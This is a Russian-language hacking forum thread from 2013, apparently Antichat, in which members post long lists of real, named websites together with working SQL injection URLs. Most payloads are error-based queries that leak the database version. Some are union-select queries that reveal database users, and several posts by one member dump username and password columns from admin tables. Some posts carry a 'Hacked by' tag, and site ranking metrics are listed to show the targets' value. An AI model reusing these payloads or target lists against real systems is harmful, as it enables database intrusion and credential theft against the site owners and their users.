SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    el43.ru

    PHP:
    http://el43.ru/tovar_v.php?ID=13+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:20||PR:3


    ==================================================

    www.tv-video.ru

    PHP:
    http://www.tv-video.ru/?action=goods_view&id=20+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:20||PR:1


    ==================================================
    progman-soft.ru

    PHP:
    http://progman-soft.ru/helptxt/kadr/spr.php?id=30+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:1


    ==================================================

    piknik.net.ua

    PHP:
    http://piknik.net.ua/?R=catalog&id=30+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:0


    ==================================================
     
    #15501 qaz, 8 Aug 2013
    Last edited: 8 Aug 2013
    1 person likes this.
  2. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    eastbayscore.org PR-5 Alexa-49k
    Code:
    http://eastbayscore.org/event.php?parent_id=-22+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9+--+
    Code:
    5.0.96-log:[email protected]:scorecms
    entsweb.ltd.uk Alexa-474k
    Code:
    http://entsweb.ltd.uk/jobs.php?pageid=jobs&category=0+UNION+SELECT+1,2,3,4,5,6,7,8,9,0,concat_ws(0x3a,version(),user(),database()),12,13,14,15,16,17,18+--+
    Code:
    5.0.96-community:entswebl_webouse@localhost:entswebl_webo
    eqtraders.com Alexa-206k
    Code:
    http://eqtraders.com/items/show_item.php?item=-22833+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118+--+
    Code:
    5.0.96-community:eqtrader_eqread@localhost:eqtrader_main
    stluciesheriff.com Alexa-346k PR-5 шерифляндия
    Code:
    http://stluciesheriff.com/news_article.php?news_id=-741+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7+--+
    Code:
    5.1.24-rc-log:[email protected]:slcsheriff
     
    2 people like this.
  3. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    www.prom-info.com

    PHP:
    http://www.prom-info.com/index.php?m=4&id=49+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:0


    ==================================================

    www.lkm.kiev.ua

    PHP:
    http://www.lkm.kiev.ua/index.php?R=catalog&id=76+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:0


    ==================================================

    cellfaktor.ru

    PHP:
    http://cellfaktor.ru/catalogtovar.php?cat=7&tov=31&id=120+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:0


    ==================================================

    new.vodaspb.ru

    PHP:
    http://new.vodaspb.ru/note.php?id=131+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:20||PR:0


    ==================================================


    cool-cook.ru

    PHP:
    http://cool-cook.ru/content/?id=145+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:0||PR:1


    ==================================================

    www.dcmagazine.ru

    PHP:
    http://www.dcmagazine.ru/journal.html?id=7%0D%0A+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:30||PR:2


    ==================================================

    koral-chelny.ru

    PHP:
    http://koral-chelny.ru/otzyvy.php?id=3+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:3


    ==================================================
     
    #15503 qaz, 8 Aug 2013
    Last edited: 8 Aug 2013
    1 person likes this.
  4. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    ==========================================
    ==========================================
    ==========================================
    pr=3
    ==========================================
    blind, mysql 5 версии, первая буква базы i
    ==========================================
     
    #15504 YaBtr, 8 Aug 2013
    Last edited: 8 Aug 2013
    2 people like this.
  5. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    www.wgabus.ru

    PHP:
    http://www.wgabus.ru/?id=4+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 4 version
    CY:60||PR:2


    ==================================================

    www.lada110atricom.ru

    PHP:
    http://www.lada110atricom.ru/index.php?content=word_all&id=6+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:0


    ==================================================

    soctech.ru

    PHP:
    http://soctech.ru/index.php?module=articles&file=article&id=1+and(select+1+from(select+count(*),concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+
    db 5 version
    CY:30||PR:1


    ==================================================
     
    #15505 qaz, 8 Aug 2013
    Last edited: 8 Aug 2013
    1 person likes this.
  6. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    ==========================================
    ==========================================
    ==========================================
     
  7. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    www.kso-ekb.ru

    PHP:
    http://www.kso-ekb.ru/service.php?id=2+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:0


    ==================================================

    www.creasol.ru

    PHP:
    http://www.creasol.ru/print.php?id=5+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:30||PR:3


    ==================================================

    www.akrealt.kz

    PHP:
    http://www.akrealt.kz/index.php?page=premises_detail&id=5+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:1


    ==================================================


    country.tj

    PHP:
    http://country.tj/index.php?c=news&id=3+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:2


    ==================================================

    www.malikov-art.ru

    PHP:
    http://www.malikov-art.ru/projects.html?id=3+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:40||PR:3


    ==================================================

    www.zhemkov.ru

    PHP:
    http://www.zhemkov.ru/index.php?rub=katalog&id=6+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:0||PR:0


    ==================================================

    avi-mp3.ru

    PHP:
    http://avi-mp3.ru/go/?id=8+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:0||PR:3


    ==================================================

    www.uezdniigorod.ru

    PHP:
    http://www.uezdniigorod.ru/article.php?id=9+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:0||PR:2


    ==================================================

    pyatoe.ru

    PHP:
    http://pyatoe.ru/feedback/otzyvy/?id=13+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:3


    ==================================================
     
    #15507 qaz, 9 Aug 2013
    Last edited: 9 Aug 2013
  8. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Телеканал Tonis
    Code:
    http://www.tonis.ua/index.pl?page=forum&id=-871%27+union+select+1,2,3,4,5,6,version%28%29,8+--+
    5.1.66-0+squeeze1-log
     
  9. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.henryyanart.com/product.php?id=-1+union+select+1,concat_ws(0x3a,ver sion(),user(),database()),3,4,5,6,7,8,9,10,11--
     
  10. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    www.pyatoe.ru

    PHP:
    http://www.pyatoe.ru/feedback/otzyvy/?id=15+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:3


    ==================================================

    elisavetgrad.ho.ua

    PHP:
    http://elisavetgrad.ho.ua/View_video.php?id=17+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:0||PR:2


    ==================================================

    www.atamura.kz

    PHP:
    http://www.atamura.kz/view_news.php?id=20+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:20||PR:1


    ==================================================

    soyuzpisateley.ru

    PHP:
    http://piknik.net.ua/?R=catalog&id=30+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:400||PR:5


    ==================================================

    www.citymt.ru

    PHP:
    http://www.citymt.ru/product/firm.php?id=1+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:2


    ==================================================

    www.clip-touristic.com

    PHP:
    http://www.clip-touristic.com/index.php?id=28&tour_id=194+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:2


    ==================================================

    www.teleorakul.com

    PHP:
    http://www.teleorakul.com/actor?id=32+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:1


    ==================================================

    www.novotorg.ru

    PHP:
    http://www.novotorg.ru/catalog/?id=1+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:40||PR:2


    ==================================================

    www.nord-lk.ru

    PHP:
    http://www.nord-lk.ru/kabinet_view.php?id=2+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:20||PR:1


    ==================================================

    www.fabrica33.ru

    PHP:
    http://www.fabrica33.ru/index.php?id=2&cat=2+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:3


    ==================================================
     
    #15510 qaz, 10 Aug 2013
    Last edited: 10 Aug 2013
    1 person likes this.
  11. ForcePush

    ForcePush New Member

    Joined:
    14 Jul 2013
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    PR 2
     
  12. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    www.mebeltoday.ru

    PHP:
    http://www.mebeltoday.ru/index.php?pl=rprice&id=5+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:1


    ==================================================

    h-rod.ru

    PHP:
    http://h-rod.ru/teach.php?id=5+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:20||PR:


    ==================================================

    www.realtynavigator.ru

    PHP:
    http://www.realtynavigator.ru/index.php?whosend=detail&lng=ru&id=8+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:2


    ==================================================
     
    #15512 qaz, 10 Aug 2013
    Last edited: 10 Aug 2013
  13. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://webproverka.com/index-list_sites.php?sort=-23+union+select+1,concat_ws(0x3a,version(),user(),database(),0x4861636b6564206279205365706f),3,4,5,6,7,8--
     
  14. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    www.minato.ru

    PHP:
    http://www.minato.ru/view.php?CID=4&ID=10+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:0||PR:1


    ==================================================

    www.darsil.ru

    PHP:
    http://www.darsil.ru/?id=10+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:50||PR:2


    ==================================================

    koral-kazan.ru

    PHP:
    http://koral-kazan.ru/otzyvy.php?id=10+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:3


    ==================================================

    www.mezzatorre.it

    PHP:
    http://www.mezzatorre.it/ru/camera.php?id=10+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:140||PR:3


    ==================================================

    www.rusradiokrasnodar.ru

    PHP:
    http://www.rusradiokrasnodar.ru/gallery/?id=10+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:30||PR:1


    ==================================================

    wszmk.ru

    PHP:
    http://wszmk.ru/index.php?id=13&ntable=46&pg_nom=43+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:30||PR:3


    ==================================================

    www.mallorcarusskaya.ru

    PHP:
    http://www.mallorcarusskaya.ru/playas.php?id=14+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:0||PR:


    ==================================================

    otpusk21.com

    PHP:
    http://otpusk21.com/modul.php?id=14+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:0||PR:3


    ==================================================

    www.promind.ru

    PHP:
    http://www.promind.ru/shop/model.php?id=14+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:90||PR:2


    ==================================================

    shop.duplet.com.ua

    PHP:
    http://shop.duplet.com.ua/index.php?R=catalog&id=15+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:0||PR:2


    ==================================================

    www.discoverytour.ru

    PHP:
    http://www.discoverytour.ru/?id=16+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:20||PR:3


    ==================================================

    www.ta-mp.ru

    PHP:
    http://www.ta-mp.ru/?page=tours&rem=sea&id=16+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:0||PR:0


    ==================================================

    equator.ulagr.com

    PHP:
    http://equator.ulagr.com/articles/detail&id=16+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:0||PR:0


    ==================================================

    sport-dom.com

    PHP:
    http://sport-dom.com/index.php?main_page=news_manager_all_news&id=16+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:0||PR:1


    ==================================================

    3musk.ulagr.com

    PHP:
    http://3musk.ulagr.com/articles/detail&id=17+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:0||PR:0


    ==================================================

    as-event.ru

    PHP:
    http://as-event.ru/blog/?id=19+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:20||PR:1


    ==================================================

    www.severus-mebel.ru

    PHP:
    http://www.severus-mebel.ru/index.php?menu=catalog&task=select_item&groupID=0&cond=0&catID=0&ID=21&savedID=5&what=0&itemID=6291+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:0


    ==================================================

    liderprice.com.ua

    PHP:
    http://liderprice.com.ua/list_goods.php?cid=8&id=21+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:0||PR:2


    ==================================================

    www.rielty-plus.ru

    PHP:
    http://www.rielty-plus.ru/card4flat.php?id=22+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:1


    ==================================================

    socio.bas-net.by

    PHP:
    http://socio.bas-net.by/newsdetailed.php?id=23+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:40||PR:5


    ==================================================

    shkolaint8.ru

    PHP:
    http://shkolaint8.ru/index.phtml?id=24+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:0||PR:1


    ==================================================

    creator.org.ua

    PHP:
    http://creator.org.ua/show.php?id=26+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:0||PR:1


    ==================================================

    www.hobbycenter.by

    PHP:
    http://www.hobbycenter.by/news.php?id=27+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:40||PR:5


    ==================================================

    idel-travel.com

    PHP:
    http://idel-travel.com/t.php?id=31+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:0||PR:1


    ==================================================
     
    #15514 qaz, 10 Aug 2013
    Last edited: 10 Aug 2013
    1 person likes this.
  15. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Почта России
    Code:
    http://www.gcmpp.ru/zona/pravovie_documenti/pravovie_documenti.php?action=view&cat=2+and+1=0+Union+Select+1,2,0x4861636b6564206279205365706f,4,5,6--
     
    1 person likes this.
  16. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    dom-secret.ru

    PHP:
    http://dom-secret.ru/article.php?id=31+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:0


    ==================================================

    bat.crimea.ua

    PHP:
    http://bat.crimea.ua/excursion_items/excursion_items.php?id=32+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:20||PR:1


    ==================================================

    www.ishimtur.ru

    PHP:
    http://www.ishimtur.ru/index.php?id=35+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:0


    ==================================================

    www.hlebspb.ru

    PHP:
    http://www.hlebspb.ru/news.html?id=39+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:30||PR:2


    ==================================================

    www.telar.ru

    PHP:
    http://www.telar.ru/products.php?id=39+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:3


    ==================================================

    www.smol-kabel.ru

    PHP:
    http://www.smol-kabel.ru/index.php?module=catalog&id=89+and(select+1+from(select+count(*),concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+
    db 5 version
    CY:90||PR:1


    ==================================================

    www.prom-info.com

    PHP:
    http://www.prom-info.com/index.php?m=4&id=92+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:0


    ==================================================

    www.mynany.org

    PHP:
    http://www.mynany.org/index.php?module=articles&file=article&id=98+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:3


    ==================================================

    www.matkarhea.fi

    PHP:
    http://www.matkarhea.fi/index.php?id=57+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:0||PR:3


    ==================================================

    www.tpo-orlov.ru

    PHP:
    http://www.tpo-orlov.ru/?Id=50+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:0


    ==================================================

    ufdvgu.ru

    PHP:
    http://ufdvgu.ru/events/anons/show/?id=51+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:350||PR:4


    ==================================================

    www.medy.ru

    PHP:
    http://www.medy.ru/pages.php?id=59+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:30||PR:1


    ==================================================

    nikimlt-povolgye.ru

    PHP:
    http://nikimlt-povolgye.ru/catalog_lvl2/?id=60+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:30||PR:2


    ==================================================

    www.spycamera.ru

    PHP:
    http://www.spycamera.ru/print.php?id=62+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:400||PR:4


    ==================================================

    suz-antiq.ru

    PHP:
    http://suz-antiq.ru/index.php?part=catalog&cat=7&id=67+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:0||PR:2


    ==================================================

    www.alfa-perevod.ru

    PHP:
    http://www.alfa-perevod.ru/ru/news?id=70+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:90||PR:3


    ==================================================

    www.marbellalux.ru

    PHP:
    http://www.marbellalux.ru/rent_apartament_order.php?id=70+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:1


    ==================================================

    www.travel.vbg.ru

    PHP:
    http://www.travel.vbg.ru/catalog/hotel.php?id=71+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:20||PR:4


    ==================================================

    www.datsha.com

    PHP:
    http://www.datsha.com/rus/news.php?id=86+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:40||PR:4


    ==================================================

    mice.crimea.ua

    PHP:
    http://mice.crimea.ua/news.php?id=88+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:10||PR:2


    ==================================================

    www.moreodor.ru

    PHP:
    http://www.moreodor.ru/php/page.php?m=57&id=101+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:0||PR:0


    ==================================================
     
    #15516 qaz, 11 Aug 2013
    Last edited: 11 Aug 2013
  17. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Code:
    http://www.xits-sound.com/details.php?id=-13%27+union+select+1,2,3,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28xitssoun.users%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,username,0x3a,password%29%29%29%29x%29,5,6,7,8+--+
     
    1 person likes this.
  18. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    sabotage-rockgroup.ru

    PHP:
    http://sabotage-rockgroup.ru/modules/publication/article.php?id=1+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:130||PR:1


    ==================================================

    sochland.ru

    PHP:
    http://sochland.ru/sub5/?id=4+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:20||PR:3


    ==================================================

    metrofashion.ru

    PHP:
    http://metrofashion.ru/content.php?id=5+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 4 version
    CY:40||PR:2


    ==================================================

    www.ryabov.com

    PHP:
    http://www.ryabov.com/article.php?id=36+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:0||PR:1


    ==================================================
     
    #15518 qaz, 12 Aug 2013
    Last edited: 12 Aug 2013
  19. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    ================================
    blind, первая буква названия базы s
    ================================
    blind, mysql 5 версии
    ================================
    ================================
     
    #15519 YaBtr, 12 Aug 2013
    Last edited: 12 Aug 2013
    1 person likes this.
  20. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Code:
    http://hafiz-chair.com/gallery.php?id=-6+union+select+1,2,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28webbrend_hafiz.userlist%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,user,0x3a,pass%29%29%29%29x%29+--+
    
    http://www.sprucedanddappa.net/shop.php?id=2&sid=-3+union+select+1,2,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28hunterde_sdshop.admin%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,admin_name,0x3a,admin_pass%29%29%29%29x%29,4,5+--+
    
     
    #15520 Unknowhacker, 12 Aug 2013
    Last edited: 12 Aug 2013
Thread Status:
Not open for further replies.